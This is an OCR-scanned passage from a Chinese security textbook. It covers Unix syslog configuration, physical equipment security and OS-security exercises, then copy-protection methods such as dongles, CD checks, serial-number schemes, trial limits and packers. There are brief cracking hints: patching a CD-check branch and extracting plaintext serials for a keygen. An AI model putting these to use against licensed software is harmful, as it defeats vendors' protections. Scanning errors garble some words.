序 ,solaris 下 在 /usr/sbin/syslogd)、/etc/syslog. conf (配置 文件 ) 和 /var/adm 或 /var/log。 
多 数 syslog 信息 被 写 到 这 些 目录 下 的 信息 文件 中 。 

syslog. conf 的 格式 如 下 : 


设备 .行为 级 别 [; 设备 .行为 级 别 ] 记录 行为 


注意 各 栏 之 间 用 [Tabj] 分 隔 , 用 空格 是 无 效 的 。Syslog 文件 _ 设 备 如 表 6. 11 所 示 ， 
Syslog 文件 _ 行 为 级 别 如 表 6. 12 所 示 。 
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表 6.11 Syslog 文 件 设备 


设备 描 述 
auth 认证 系统 
cron cron 和 at 命令 
daemon 系统 守护 进程 
kern 内 核 消息 
lpr 打印 机 系统 
mail 邮件 系统 
news 新 闻 系统 
user 应 用 程序 
uucp uucp 子 系统 
utmp 记录 当前 登录 的 每 个 用 户 
local10..7 保留 给 用 户 使 用 

表 6.12 Syslog 文 件 行为 级 别 

行为 级 别 描 ” 述 
debug 调试 程序 时 的 消息 
info 信息 消息 
notice 要 注意 的 消息 
Warning 警告 消息 
err 一 般 性 错误 
crit 严重 情况 
alert 应 立即 被 修正 的 情况 
emerg 紧急 情况 
none 指定 的 服务 程序 未 给 所 选择 的 


(4) 程序 日 志 。UNIX 为 一 些 特殊 程序 或 命令 保存 日 志 , 如 Sulog 是 系统 为 su 保持 一 
个 日 志 , 存 放 在 /var/adm/sulog 中 ; httpd 日 志 存 放 在 /var/apache/access-log 中 ;uucp 日 志 
等 。uucp 命令 用 于 两 系统 间 的 文件 传输 ,用 /usr/spool/uucp 目录 存放 工作 文件 。 命令 的 
一 般 格式 为 : uucp source_file destination_file。 


6.5 设备 安全 
设备 场地 环境 安全 一 — 非 自然 灾害 ,防盗 : 视频 监控 ,警报 器 警卫, 防火， 火灾 警报 


器 、 灭 火 设备 ,防水 : 隔离 水 源 ;三 度 控制 : 温度 、 湿 度 、 洁 净 度 ; 防 雷 : 外 壳 接 地 (建筑 钢筋 ) 。 
防 静 电 : 集成 电路 对 静电 敏感 ,采用 乙烯 材料 装修 ,避免 使 用 挂 毯 ` 地 毯 等 吸 尘 、 容 易 产 
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生 静 电 的 材料 。 防 过 热 : 没有 温 控 设备 的 场地 采用 风扇 冷却 ,或 限定 开机 时 长 。 电 源 保障 : 
UPS ,应 急电 源 。 电 磁 防 护 : 计算 机 通过 电磁 发 射 引 起 信息 泄露 ,泄露 信息 可 以 分 析 、 预 测 、 
接收 ,识别 .复原 。 防 护 措施 : 屏蔽 、 隔 离 ,滤波 、 吸 波 、 接 地 等 。 


本 章 小 结 


操作 系统 (OS) 是 计算 机 裸 机 上 添加 设备 管理 文件 管理 .存储 管理 ,处理 机 管理 .作业 
管理 和 进程 管理 等 资源 的 分 类 模块 处 理 。OS 安全 指 操作 系统 中 安全 性 研究 ,主要 通过 身 
份 鉴别 .自主 访问 控制 .标记 和 强制 访问 控制 .数据 流 控 制 . 审 计 、 数 据 完 整 性 .数据 保密 性 等 
几 方 面 来 实现 系统 的 安全 需要 。 安 全 操作 系统 指 满足 某 安 全 等 级 的 操作 系统 。 

安全 操作 系统 是 指 计算 机 操作 系统 在 自主 访问 控制 ,强制 访问 控制 .标记 、 身 份 鉴别 、 客 
体重 用 、 审 计 ` 数 据 完整 性 、 隐 项 信道 分 析 、 可 信 路 径 和 可 信 恢 复 10 个 方面 满足 相应 的 安全 
技术 要 求 。 安 全 操作 系统 的 主要 特征 是 : 

(1) 最 小 特权 原则 , 即 每 个 特权 用 户 只 拥有 能 进行 他 工作 的 权力 。 

(2) 自主 访问 控制 和 强制 访问 控制 ,包括 保密 性 访问 控制 和 完整 性 访问 控制 。 

(3) 安全 审计 。 

(4) 安全 域 隔离 。 

操作 系统 是 硬件 与 应 用 软件 之 间 的 桥梁 。 从 安全 性 考虑 ,系统 应 提供 物理 上 分 离 ,时间 
上 分 离 .逻辑 上 分 离 ,密码 上 分 离 。 计 算 机 硬件 安全 的 目标 是 保证 其 自身 的 可 靠 性 ,并 为 操 
作 系 统 提 供 基本 的 安全 设施 ,常用 的 有 内 存 保护 、 运 行 保护 和 I/O 保护 等 。 

可 信 计 算 基 (Trusted Computing Base, TCB) ,是 指 具体 实现 安全 策略 的 可 信和 软件 和 硬 
件 及 安全 管理 人 员 的 集合 。 

Windows 2000/XP 安全 模型 的 主要 功能 是 用 户 身 份 验证 和 访问 控制 。NT 的 安全 模 
型 由 以 下 4 个 关键 部 分 构成 : 登录 过 程 (Logon Process,LP); 本 地 安全 授权 机 构 (Local 
Security Authority,LSA); 安 全 账号 管理 器 (Security Account Manager, SAM); 安 全 引用 
监视 器 (Security Reference Monitor,SRM) 。Vista/Win7 使 用 NAP 执行 强制 性 的 安全 
策略 。 

UNIX 安全 模型 主要 有 账号 (用 户 和 口令 ) 安 全 和 文件 系统 安全 ,包括 文件 保护 、 账 号 安 
全 ,网络 安 全 ,安全 组 件 和 程序 日 志 等 。 


习 题 6 


6.1 简 述 操作 系统 账号 密码 的 重要 性 。 有 几 种 方法 可 以 保护 密码 不 被 破解 或 者 被 盗 取 ? 
6.2 简 述 审核 策略 .密码 策略 和 账户 策略 的 含义 ,这 些 策 略 如 何 保 护 操作 系统 不 被 人 侵 ? 
6.3 ”如何 关闭 不 需要 的 端口 和 服务 ? 

6.4 操作 系统 的 隔离 保护 技术 有 哪 几 种 ? 什么 是 沙 盒 技术 ? 

6.5 编写 程序 实现 本 章 所 有 注册 表 的 操作 (上 机 完成 ) 。 

6.6 以 报告 的 形式 编写 Windows XP/7/8 Server 的 安全 配置 方案 。 
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第 7 章 软件 保护 与 DRM 


7.1 软件 保护 概述 


7.1.1 软件 保护 概念 


计算 机 软件 是 一 种 知识 密集 的 特殊 产品 ,生产 一 个 软件 产品 需要 大 量 的 人 力 ,物力 、 财 
力 , 生 产 难度 和 成 本 都 很 大 ,复制 盗用 的 费用 低 .手段 繁多 ,从 而 造成 软件 的 研制 者 或 销售 商 
的 权益 受 损 。 因 此 ,作为 一 种 知识 产权 的 软件 产品 需要 对 它 加 以 保护 。 随 着 软件 保护 技术 
蓬勃 兴起 ,出 现 了 各 种 各 样 的 给 自己 研制 或 销售 的 软件 加 上 防盗 版 功能 的 技术 。 

软件 保护 就 是 既 要 从 法 律 上 保护 计算 机 软件 著作 权 人 的 权益 和 知识 产权 ,调整 计算 机 
软件 在 开发 .传播 和 使 用 中 发 生 的 利益 关系 ,鼓励 计算 机 软件 的 开发 与 合法 使 用 ;又 要 从 技 
术 上 防止 软件 的 非法 复制 .盗版 和 非法 使 用 。 

需要 技术 保护 的 软件 产品 有 : 

(1) 防止 无 偿 地 复制 和 次 用 的 软件 产品 ; 

(2) 含有 重要 的 或 涉 密 的 敏感 文件 和 数据 的 软件 ,防止 被 未 经 许可 的 非法 用 户 穷 取 、 修 
改 和 删除 ; 

(3) 作为 商品 出 售 的 软件 产品 。 

从 现在 网 络 上 共享 软件 的 生存 状况 看 ,软件 的 非法 使 用 是 一 个 普遍 存在 的 现象 。 通 过 
搜索 引擎 ,各 种 软件 的 用 户 名 和 注册 码 都 在 网 络 上 随手 可 得 ,很 容易 找到 所 需 的 软件 序列 
号 。 有 些 专门 提供 盗版 软件 的 网 站 将 自己 的 网 站 名 称 作为 其 发 布 的 软件 的 用 户 名 ,并 公 
对 应 的 注册 码 。 多 数 情况 下 只 要 在 共享 软件 中 填 人 注册 码 ,软件 立刻 成 为 已 注册 版 本 ,不 再 
有 任何 使 用 上 的 限制 。 

软件 保护 技术 除了 促使 普通 用 户 注册 、 保 证 软件 开发 者 的 经 济 利益 之 外 ,还 要 防止 专业 
计算 机 人 员 对 软件 的 分 析 和 破解 。 软 件 分 析 技 术 可 以 分 为 静态 分 析 和 动态 分 析 两 种 不 同 的 
技术 ,针对 两 种 不 同 的 技术 ,有 各 自 不 同 的 软件 保护 方法 。 


7.1.2 软件 保护 技术 的 发 展 历史 


人 们 通常 使 用 的 是 微软 操作 系统 (OS) ,应 用 软件 产品 大 多 是 基于 微软 OS 的 软件 ,而 
软件 保护 主要 是 针对 微软 操作 系统 的 技术 。 

微软 DOS 操作 系统 时 期 ,软件 主要 是 正式 版 和 功能 不 全 的 Demo 版 以 及 一 些 磁盘 防 拷 
贝 保护 ,很 少 有 所 谓 的 共享 软件 (Shareware)。 所 以 DOS 时 代 所 谓 的 软件 保护 通常 是 限制 
软件 中 的 某 些 功能 或 使 用 时 间 ,次 数 ,或 者 检查 是 否 原版 磁盘 。 由 于 16 位 操作 系统 很 容易 
接触 到 系统 底层 的 原因 ,从 而 导致 个 别 软件 保护 方式 异常 强悍 ,破解 跟踪 困难 。 

Windows 95/98 时 期 ,共享 软件 渐渐 地 盛行 起 来 ,采用 序列 号 加 密 保护 的 共享 软件 越 来 
越 多 ,但 保护 技术 经 历 了 从 脆弱 到 强悍 的 过 程 ,后 期 一 些 需要 较 高 编程 技巧 ,与 系统 核心 等 
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底层 联系 紧密 的 软件 纷纷 出 笼 ,不 能 随 随 便便 就 能 被 破解 。 

Windows 2000/NT/XP/2003 时 期 ,各 种 的 软件 外 壳 加 密 技 术 出 现 , 大 大 地 提高 了 软件 
的 保护 质量 ;同时 解密 技术 也 不 断 提高 ,各 种 新 式 的 加 密 解 密 工具 随 之 出 现 。 此 时 的 序列 号 
加 密 开始 采用 密码 学 中 不 可 北 的 加 密 算法 ,解密 者 必须 对 各 种 成 熟 加 密 算法 有 很 深 的 了 解 ， 
或 者 找 出 软件 加 密 算法 的 漏洞 。XP 还 引入 了 数字 证 书 ,激活 、 补 丁 、 版 本 升级 等 机 制 。 

Windows Vista/ Win7/Win8 时 期 引入 了 新 的 重要 安全 机 制 ,如 在 线 认证 ,在 线 升 级 和 
云 数据 中 心 等 。 在 保护 用 户 隐私 的 同时 为 个 人 和 公司 的 数据 提供 更 大 的 保护 ,使 其 免 受 恶 
意 用 户 及 恶意 程序 导致 的 泄露 和 损坏 等 破坏 。 


7.1.3 软件 保护 的 技术 目的 


(1) 防止 对 程序 的 非法 执行 。 

用 户 执行 程序 必须 拥有 一 定 的 权限 或 账号 并 通过 安全 验证 ,没有 权限 或 账号 的 用 户 不 
能 使 用 软件 程序 或 使 用 出 错 。 

(2) 防止 对 程序 的 非法 拷贝 。 

防止 对 程序 的 拷贝 并 不 是 指 防 止 对 被 加 密 程序 本 身 的 拷贝 ,而 是 指 防止 对 密 钥 介质 的 
非法 复制 。 非 法 使 用 者 即使 获得 了 被 保护 程序 的 副本 ,也 会 因为 无 法 通过 合法 性 验证 而 无 
法 正常 使 用 。 

(3) 防止 对 程序 的 非法 修改 。 

通常 可 执行 程序 代码 是 以 二 进 制 代 码 的 形式 保存 的 。 只 要 获得 相关 指令 的 十 六 进 制 
码 ,就 可 用 十 六 进 制 编辑 器 查找 和 修改 了 。 所 以 必须 把 指令 的 代码 以 密 文 的 形式 保存 ,这 样 
就 可 以 有 效 地 防止 对 指令 的 直接 修改 ,从 而 确保 程序 的 完整 性 。 

(4) 防止 对 程序 的 静态 分 析 。 

静态 分 析 使 用 反 汇 编 软 件 对 可 执行 文件 进行 反 汇 编 , 分 析 得 到 程序 的 ASCII 汇编 代 
码 , 从 而 进行 分 析 破 解 。 反 汇编 的 结果 是 按照 文件 中 的 指令 代码 直接 翻译 而 来 的 ,只 要 对 文 
件 中 的 代码 加 密 , 对 密 文 反 汇 编 结 果 是 无 法 被 理解 或 不 可 读 的 。 

(5) 防止 对 程序 的 动态 跟踪 。 

由 于 动态 调试 软件 的 动态 跟踪 和 分 析 功 能 十 分 强大 , 且 工 作 在 操作 系统 级 权限 上 监控 
和 侦 测 整个 系统 ,因此 需要 对 关键 程序 代码 做 技术 变换 才 可 以 实施 特定 的 反 跟 踪 。 

(6) 防止 对 软件 的 非法 逆向 工程 。 

逆向 工程 可 以 反 向 分 析 软 件 ,为 破解 和 重 构 软 件 提供 方法 。 


7.2 软件 保护 技术 


通常 软件 发 行 有 两 种 方式 : 一 种 是 由 磁盘 (软盘 或 光盘 ) 发 行 , 另 一 种 是 由 用 户 在 互联 
网 下 载 。 软 件 保护 方法 从 代码 载体 上 主要 可 分 为 软 保护 和 硬 保护 。 一 般 都 是 通过 将 用 户 信 
息 和 原始 软件 混合 加 密 来 进行 保护 。 


7.2.1 软件 的 硬 保护 技术 
软件 的 硬 保护 技术 指 将 软件 与 硬件 介质 配套 使 用 ,通过 硬件 介质 来 控制 软件 的 运行 而 


271 


《计算 机 系统 安全 》 上 E 芝 2 


实现 保护 软件 。 在 程序 运行 时 需 额 外 加 载 硬件 或 物理 介质 ,这 种 硬件 或 物理 介质 需 随 软件 
一 起 出 售 , 由 它们 对 软件 实施 保护 。 主 要 的 硬 保 护 方 式 有 软盘 ( 密 钥 盘 ) 加密 卡 、 软 件 锁 
( 狗 ) 和 加 密 光 盘 、Ekey 或 USBkey 等 。 

1. 软盘 保护 技术 

很 多 软件 都 使 用 软盘 作为 钥匙 盘 , 当 程序 启动 时 需要 插入 钥匙 盘 ,程序 从 软盘 中 读 取 相 
应 的 信息 进行 验证 ,通过 验证 程序 就 正常 运行 ,否则 就 退出 程序 或 者 限制 程序 的 功能 。 这 样 
可 以 防止 一 般 使 用 者 的 随意 复制 。 

钥匙 盘 的 制作 一 般 是 在 软盘 上 设置 特殊 信息 ,包括 异常 格式 化 扇 区 、 特 殊 扇 区 或 坏 扇 
区 、 额 外 磁道 、 密 钥 等 。 

2. 软件 狗 保 护 技术 

复杂 的 软 硬 件 技术 结合 在 一 起 可 以 防止 非法 发 布 和 使 用 。 软 件 狗 技术 在 保护 软件 开发 
者 利益 、 防 止 软件 盗版 方面 起 了 很 大 作用 。 

软件 狗 是 一 种 智能 型 加 密 工 具 或 硬件 卡 ,也 称 为 加 密 锁 ,里 面 存 着 若干 认证 数据 。 它 是 
一 种 安装 在 并 口 .串口 或 USB 等 接口 上 的 硬件 电路 。 核 心 代码 与 数据 移植 到 加 密 锁 硬件 设 
备 内 ,与 源 程序 一 起 运行 。 当 被 狗 保护 的 软件 运行 时 ,程序 向 插 在 计算 机 接口 上 的 软件 狗 发 
出 查询 命令 ,软件 狗 迅 速 计算 查询 并 给 出 响应 ,正确 的 响应 保证 软件 继续 运行 。 如 果 没 有 软 
件 狗 ,程序 将 不 能 运行 。 

按 软件 狗 的 发 展 , 它 经 历 了 4 代 。 第 一 代 是 存储 器 型 的 加 密 锁 ,内 部 只 有 存储 体 ,只 能 
读 写 。 第 二 代 是 算法 不 公开 的 加 密 锁 ,硬件 内 部 增加 了 单片机 ,主要 利用 算法 功能 进行 加 
密 。 第 三 代 是 可 编程 的 加 密 锁 , 核 心 芯片 是 EEPROM ,主机 通过 并 行 口 直接 读 写 EEPROM 
以 实现 对 加 密 信息 的 存 取 其 至 运行 ,使 软件 与 加 密 锁 实现 真正 的 无 颖 链接。 第 四 代 是 IC 智 
能 卡 芯片 ,采用 微 控 制 器 和 EEPROM 为 核心 器 件 的 智能 卡 (Smart Card) 技 术 , 具 有 更 强 的 
运算 和 数据 处 理 能 力 。 

因为 需要 硬件 密 钥 介质 的 验证 ,而 这 个 密 钥 介质 是 无 法 拷贝 或 复制 的 ,从 而 达到 保护 软 
件 、. 防 止 盗 版 的 目的 。 

USBKey 是 使 用 USB 接口 .存放 认证 数据 或 认证 程序 的 存储 器 。USB 是 在 1994 年 年 
底 由 Compaq、IBM 和 Microsoft 等 多 家 公司 联合 提出 的 一 种 连接 外 部 设备 的 新 型 通用 串 行 
接口 技术 ,具有 真正 的 即 插 即 用 和 热 插 拔 功 能 ,是 一 种 先进 的 接口 标准 。USB 软件 狗 不 但 
不 会 对 别 的 USB 设备 产生 影响 ,也 不 会 受到 别 的 USB 设备 的 影响 。 与 并 行 口 相 比 ,USB 
接口 更 适合 于 软件 狗 技 术 。 

3. 光盘 保护 技术 

光盘 保护 软件 的 原理 是 利用 特殊 光盘 的 某 些 不 可 再 现 的 特征 信息 (光盘 的 非 数据 性 内 
容 、 指 纹 等 ) ,放置 在 光盘 复制 时 复制 不 到 的 地 方 ,用 户 不 可 能 在 自己 刻录 的 光盘 上 实现 这 种 
技术 。 对 于 大 规模 生产 ,这 种 保护 方案 成 本 很 低 , 而 且 软 件数 据 和 保护 信息 在 同一 载体 上 ， 
对 用 户 无 疑 是 很 方便 的 ,具有 很 强 的 防 复制 能 力 。 

1) 特定 文件 方法 

程序 在 启动 时 判断 光驱 中 的 光盘 上 是 否 存在 特定 的 文件 ,如 果 不 存在 则 认为 用 户 没有 
正版 光盘 。 具 体 的 实现 一 般 是 这 样 的 : 

(1) 用 API 函数 GetLogicalDriveStrings() 或 GetLogicalDrivers() 得 到 系统 中 安装 的 
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驱动 器 列表 ; 

(2) 用 函数 GetDriveType() 检 查 每 一 个 驱动 器 ,取得 光盘 盘 符 ; 

(3) 用 CreateFile() 或 FindFirstFile() 等 函数 检查 光盘 中 特定 的 文件 是 否 存在 ,并 可 检 
查 文件 的 属性 ,大 小 和 内 容 等 ; 

(4) 光盘 上 存在 特定 的 文件 ,继续 运行 ,否则 退出 。 

这 种 方法 最 简单 ,比较 容易 破解 ,只 要 利用 上 述 函 数 设 断 点 找到 程序 启动 时 检查 光驱 的 
地 方 ,修改 判断 指令 就 可 以 跳 过 光盘 检查 。 

2) 物理 标记 方法 

这 种 方法 的 主要 思路 是 在 光盘 生产 线 上 实现 对 光盘 做 物理 标记 。 

(1) SafeDisc。 由 MacroVision 公司 生产 ,包括 三 种 主要 功能 : 验证 数字 签名 .内 容 保 
护 编码 和 反 破 解 软件 。 光 盘存 储 0000001. tmp .clocksp. exe、CLCD16. DLL 和 CLCD32. 
DLL 等 特殊 文件 ,还 包括 了 很 多 不 可 读 错误 ,大 约 10 000 个 不 可 读 扇 区 。 当 使 用 普通 的 刻 
录 设 备 进行 复制 时 ,其 中 的 数字 签名 不 会 被 传输 到 复制 光盘 上 。 当 使 用 这 种 光盘 时 将 会 侦 
测 这 种 文件 是 否 存在 并 运行 解码 程序 。 

(2) SecuROM。 由 SONY 公司 开发 ,这 种 技术 在 每 张 光盘 上 加 入 了 电子 指纹 和 复杂 的 
编码 技术 ,从 而 防止 盗版 。 光 盘 中 存储 隐藏 文件 CMS16. DLL、CMS_95. DLL 或 者 CMS _ 
NT. DLL, 有 一 个 Logo 图 标 。 

(3) 利用 纳米 径 迹 加 密 。 包 括 纳米 径 迹 加 密 区 的 形成 技术 ,数码 加 密 信息 形成 技术 、 纳 
米 径 迹 立体 加 密 信息 的 读 取 技 术 等 。 其 基本 原理 是 通过 重 粒子 的 友 击 ,在 光盘 母 版 上 瞬间 
沉积 ,从 而 在 光盘 母 版 的 接触 面 上 形成 具有 相同 纳米 径 迹 的 随机 防伪 信息 。 经 处 理 把 该 信 
息 经 过 诸如 傅 里 叶 变换 的 方法 再 次 加 密 ,最 后 与 应 用 软件 数据 一 起 形成 在 光盘 上 。 由 于 重 
粒子 释 击 形成 的 是 随机 的 纳米 量 级 的 径 迹 ,具有 唯一 性 和 微观 性 ,高 于 现 有 的 DVD 分 辨 
率 。 此 外 , 随 着 激光 记录 读 取 分 辩 率 的 提高 ,与 软件 互 锁 加 密 后 ,可 更 加 有 效 地 防止 光盘 被 
盗版 。 

3) 个 人 刻录 机 上 可 实现 的 保护 技术 

(1) 光盘 文件 和 目录 隐藏 。 用 专用 软件 加 密 文件 和 目录 ,或 对 文件 做 伪 刻 录 镜 像 ,刻录 
的 光盘 只 能 看 专用 加 解密 的 文件 或 超大 文件 ,使 用 光盘 必须 运行 专用 软件 并 输入 正确 的 密 
码 。 例 如 ,以 SecureBurn 为 例 ,用 该 软件 加 密 光 盘 中 只 能 看 到 4 个 加 解密 的 文件 ,软件 
Gphyfix 可 以 隐藏 光盘 中 的 目录 和 文件 。 

(2) 光盘 音 轨 防 复制 。 由 CD-Protector 加 密 的 光盘 上 除了 有 一 条 数据 轨道 外 ,还 会 刻 
录 两 条 音 轨 。 位 于 数据 轨道 的 可 执行 文件 在 被 运行 时 会 判断 是 否 有 对 应 音 轨 ,如 果 有 ,才能 
正确 运行 ;否则 拒绝 运行 。 


7.2.2 软件 的 软 保护 技术 


所 谓 软 保护 是 以 纯 软 件 的 方式 ,通过 适当 的 加 密 算法 实现 软件 加 密 而 进行 的 限制 性 保 
护 。 现 在 主要 使 用 的 软 保护 方法 和 技术 有 序列 号 保护 、 时 间 限 制 , 程 序 功能 限制 .Key File 
保护 、 软 件 加 壳 、 程 序 结构 化 异常 , 花 指 令 和 数字 证 书 等 。 

1. 序列 号 /注册 码 保 护 

有 两 种 免费 的 软件 : 一 种 是 自由 软件 (Freeware) ,完全 免费 使 用 ,没有 任何 限制 ;一 种 
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是 共享 软件 (Shareware) ,可 以 免费 试用 ,但 要 得 到 完全 的 功能 或 者 服务 一 般 需 要 注册 或 购 
买 。 大 多 数 共享 软件 都 有 诸多 的 限制 ,比如 使 用 天 数 、 有 效 日 期 ,次数 、 功 能、 未 注册 画面 、 延 
迟 或 干脆 禁用 软件 等 限制 。 在 网 上 免费 下 载 的 一 般 都 是 试用 (共享 ) 软 件 ,软件 试用 期 过 后 ， 
通过 时 间 、 功 能 等 限制 促使 用 户 去 注册 购买 。 

软件 的 注册 方式 具有 以 下 一 些 形式 : 

。 用 户 ID 或 注册 码 ; 

。 序列 号 ,通常 具有 XXXXX-XXXXX-XXXXX-XXXXX 的 形式 ; 

。 用 户 名 (或 用 户 ID) 十 注册 码 ( 或 序列 号 ); 

。 用 户 名 十 单位 名 十 序列 号 (或 注册 码 )。 

注册 过 程 一 般 是 用 户 付款 后 把 自己 的 私人 信息 或 计算 机 指纹 发 给 软件 公司 ,软件 公司 
会 根据 用 户 的 信息 计算 出 一 个 序列 码 发 给 用 户 ,使 用 户 得 到 受 保护 的 正版 软件 。 

使 用 软件 时 用 户 按照 注册 步骤 在 软件 中 输入 注册 信息 和 注册 码 ,程序 经 过 一 些 特殊 的 
运算 后 和 正确 的 注册 信息 相 比较 ,如 果 相 同 则 注册 成 功 。 注 册 信 息 的 合法 性 通过 软件 验证 
后 ,软件 就 会 取消 掉 本 身 的 各 种 限制 。 这 种 加 密实 现 简单 ,不 需要 额外 的 成 本 ,用 户 购买 
方便 。 

程序 中 注册 信息 并 不 一 定 是 显 式 存在 的 ,也 就 是 说 ,计算 出 的 注册 结果 与 正确 的 注册 信 
息 可 能 是 直接 或 间接 比较 的 。 有 些 软件 注册 时 会 在 用 户 的 计算 机 中 搜集 一 些 指纹 信息 ,让 
用 户 通过 E-mail( 或 邮寄 ) 发 给 软件 公司 并 缴费 , 才 提 供给 用 户 一 个 注册 码 或 男 外 注册 过 的 
软件 。 

序列 号 又 称 为 注册 码 ,通过 验证 用 户 名 和 序列 号 之 间 的 映射 关系 来 判断 是 否 是 合法 用 
户 , 如 果 是 合法 用 户 则 开放 全 部 软件 功能 。 当 用 户 从 网 络 上 下 载 某 个 共享 软件 过 了 试用 期 
后 ,用 户 必须 注册 方 能 继续 使 用 。 

验证 软件 序列 号 的 合法 性 过 程 其 实 就 是 验证 用 户 名 和 序列 号 之 间 的 数学 映射 关系 。 根 
据 映射 关系 的 不 同 ,有 5 种 方法 生成 注册 码 (或 序列 号 ) 。 

(1) 正 向 一 元 函数 : 序列 号 =F( 用 户 输入 信息 ) 。 正 确 注册 码 存在 于 编写 好 的 程序 中 ， 
在 内 存 比较 验证 时 可 能 是 明文 ,因此 可 以 利用 调试 器 等 工具 来 分 析 提 取 函 数 下 ,做 成 注 
册 机 。 

(2) 道 向 一 元 函数 : 用 户 输入 信息 =F-:! (序列 号 )。 序 列 号 采用 可 逆 函 数 生成 ,检查 注 
册 码 时 是 利用 下 的 逆 变 换 下 一 对 用 户 输入 的 序列 号 进行 变换 ,与 用 户 信 息 比 较 验证 。 生 成 
注册 码 的 下 函数 未 直接 出 现在 用 户 软件 代码 中 。 

(3) 对 等 函数 : Fl1( 用 户 输入 信息 )=F2( 序 列 号 ) 。 用 户 输入 信息 和 注册 码 都 通过 函数 
变换 ,内 存 中 不 比较 注册 码 的 明文 。 

(4) 二 元 函数 : 特定 值 =F3( 用 户 输入 信息 ,序列 号 ) 。 采 用 二 元 函数 映射 用 户 输入 信 
息 和 序列 号 ,验证 比较 的 是 指定 的 特定 值 。 

(5) 多 元 函数 : 特定 值 =Fx( 用 户 信息 块 1, 用 户 信息 块 2,… ,序列 号 1 ,序列 号 2,…) 。 
采用 多 元 函数 映射 。 

现成 的 加 密 算法 如 RSA、DES、MD4 和 MD5 等 可 以 用 于 软件 加 密 保护 ,同时 对 得 到 的 
明文 应 用 各 种 CRC 校 验 正 确 性 。 
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2. 时 间 限 制 

软件 功能 全 部 开放 ,但 软件 使 用 时 间 有 限制 ,如 试用 10 天 或 30 天 等 ,超过 限制 期 则 锁 
定 软件 部 分 功能 或 不 予 运行 ,只 有 付费 注册 之 后 才能 解除 限制 。 软 件 安装 时 在 系统 某 处 做 
上 时 间 标 记 , 利 用 一 些 API 时 间 函 数 计算 软件 程序 启动 时 间 、 装 载 时 间或 运行 次 数 , 当 超 出 
时 间 限 制 就 用 结束 运行 或 取消 功能 来 提醒 用 户 注 册 。 

时 间 限 制 一 般 有 两 种 : 一 种 是 每 次 运行 多 少时 间 ,对 运行 时 间或 次 数 累加 ; 另 一 种 是 每 
次 运行 时 间 不 限 , 但 是 有 一 个 固定 时 间 段 限制 。 常 用 的 API 时 间 函 数 有 设置 计时 器 函数 
Settimer()、 系 统 启动 计时 函数 GetTickCount() ,获取 当前 时 间 函 数 GetSystemtime() 、 获 
取 本 地 时 间 函 数 GetLocaltime()、 获 取 文 件 创 建 时 间 函 数 GetFiletime()、 驱 动 程序 最 精确 的 
周期 性 通知 timeSetEvent() ,使 用 VMM 的 Set_Global_time_Out(O) 服 务 .GetTickCount() 等 。 

3. 程序 功能 限制 

试用 软件 Demo 版 禁止 某 些 重要 功能 ,菜单 中 部 分 选项 是 灰色 ,直到 成 为 正式 用 户 。 功 
能 限制 ,一 种 是 Demo 版 程序 代码 中 包含 了 被 限制 的 功能 代码 , 另 一 种 是 Demo 版 程序 代码 
中 不 包含 禁止 的 功能 代码 。 

4，Key File 保护 

Key File 保护 又 称 为 注册 文件 ,一 般 是 一 个 纯 文 本 或 二 进 制 的 小 文件 ,多 数 情况 下 是 以 
“x . key" 形式 存在 的 ,其 内 容 有 用 户 名 、 注 册 码 等 信息 , 常 被 加 入 一 些 垃圾 信息 和 正确 信息 
混合 后 加 密 。 软 件 程序 中 部 分 代码 或 数据 和 注册 文件 中 的 部 分 信息 发 生 关联 ,检测 分 散在 
不 同 的 模块 中 进行 判断 。 该 文件 一 般 是 放 在 软件 的 安装 目录 中 或 系统 目录 下 ,软件 每 次 启 
动 时 ,从 该 文件 中 读 取 必要 的 数据 ,然后 利用 某 种 算法 进行 处 理 判断 是 否 为 正确 的 注册 文 
件 , 如 果 正 确 则 软件 以 注册 版 模式 来 运行 。 

5. Nag 窗口 

Nag 的 本 义 是 烦人 的 意思 。Nag 窗口 是 软件 设计 者 用 来 不 时 提醒 用 户 购买 正式 版 本 的 
窗口 。 它 可 能 会 在 程序 启动 或 退出 时 弹出 来 ,或 者 在 软件 运行 的 某 个 时 刻 随机 或 定时 地 弹 
出 来 ,确实 比较 烦人 。 

6. License 授权 证 书 保护 

软件 通过 正确 的 License 文 件 运行 ,多 用 于 大 型 的 商业 软件 。License 授权 证 书 文件 都 
有 固定 的 格式 ,一 般 是 一 个 License 对 应 软件 的 一 个 功能 模块 ,如 果 想 要 增加 软件 功能 ,只 
要 购买 相应 的 模块 License 就 可 以 使 用 了 ,软件 本 身 并 不 需要 进行 升级 ;或 者 是 不 同 的 
License 许可 的 用 户 数量 不 同 , 有 单 用 户 License、 多 用 户 License, 有 单机 版 License、 网 络 版 


License 等 。 
7.2.3 壳 保护 技术 


壳 的 概念 是 我 国 软件 加 密 与 解密 领域 的 前 辈 能 焰 先 生 在 DOS 时 代 推 出 RCopy3 脱 壳 
软件 时 首先 提出 的 。 所 谓 “ 壳 ”就 是 在 exe、com 和 dll 等 可 执行 程序 文件 中 加 入 的 一 段 保护 
层 代 码 ,改变 或 隐藏 了 程序 真正 的 人口 点 OEP, 并 比 原 程序 抢先 获得 控制 权 。 这 段 代 码 形 
象 地 称 为 程序 的 “ 壳 ”。 

和信 口 点 (Address Of Entry Point) 是 PE 格式 (在 7. 3. 2 节 详 述 ) 的 可 执行 文件 执行 时 的 
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入 口 点 , 即 是 PE 头 格式 中 的 Entry Point 地 址 。 可 用 PEditor 或 者 LoadPE 等 工具 查看 , 程 
序 文件 执行 时 Entry Point 的 值 就 是 第 一 行 代码 的 地 址 (加 上 基地 址 ) 。 

加 壳 是 在 不 妨碍 原 程序 运行 的 前 提 下 ,在 软件 中 加 入 新 的 代码 ,改变 原来 软件 代码 的 组 
织 结构 (压缩 或 加 密 ) ,隐藏 了 原 程序 文件 的 执行 代码 ,保护 程序 不 被 非法 修改 和 反 编 译 ,从 
而 保护 程序 不 被 破解 。 病 毒 , 木 马 等 就 是 用 加 壳 来 躲避 杀毒 软件 的 。 

软件 的 壳 分 为 加 密 壳 .压缩 壳 .伪装 过 和 多 层 壳 等 类 。 

加 壳 要 保证 文件 的 格式 不 改变 ,否则 加 壳 后 的 文件 不 能 执行 ,可 以 利用 专门 的 软件 或 压 
缩 工具 对 可 执行 程序 进行 加 这。 

使 用 压缩 工具 (Packers) 压 缩 程序 ,可 以 使 软件 变 得 更 小 ,减少 了 程序 的 体积 ,便于 程序 
的 存储 和 传播 。 压 缩 壳 也 保护 了 程序 ,使 破解 者 无 法 轻易 看 到 和 修改 程序 真实 代码 。 

加 密 壳 包含 了 加 密 所 需 的 各 种 层次 结构 ,如 反 跟 踪 、 解 密 还 原 和 设置 环境 等 。 在 通过 了 
